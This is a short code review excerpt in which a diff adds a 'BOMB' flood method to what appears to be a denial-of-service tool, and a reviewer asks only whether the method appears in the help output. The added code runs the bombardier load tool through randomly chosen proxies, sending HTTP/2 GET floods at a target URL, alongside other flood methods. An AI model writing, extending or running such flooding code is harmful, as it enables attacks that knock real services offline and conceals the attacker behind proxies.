start.py

```diff
@@ -835,6 +836,21 @@ def select(self, name: str) -> None:
                 self._defaultpayload +
                 "Host: %s\r\n\r\n" % self._target.authority).encode()
         if name == "EVEN": self.SENT_FLOOD = self.EVEN
+        if name == "BOMB": self.SENT_FLOOD = self.BOMB
+
+    def BOMB(self):
+        pro = randchoice(self._proxies)
+        run([
+            f'{Path.home() / "go/bin/bombardier"}',
+            f'--connections={self._rpc}',
+            '--http2',
+            '--method=GET',
+            '--no-print',
+            '--timeout=5s',
+            f'--requests={self._rpc}',
+            f'--proxy={pro}',
+            f'{self._target.human_repr()}',
```

Comment:
will it be reflected in help utput somehow? I see `bomb` u add as a new method. OK, but...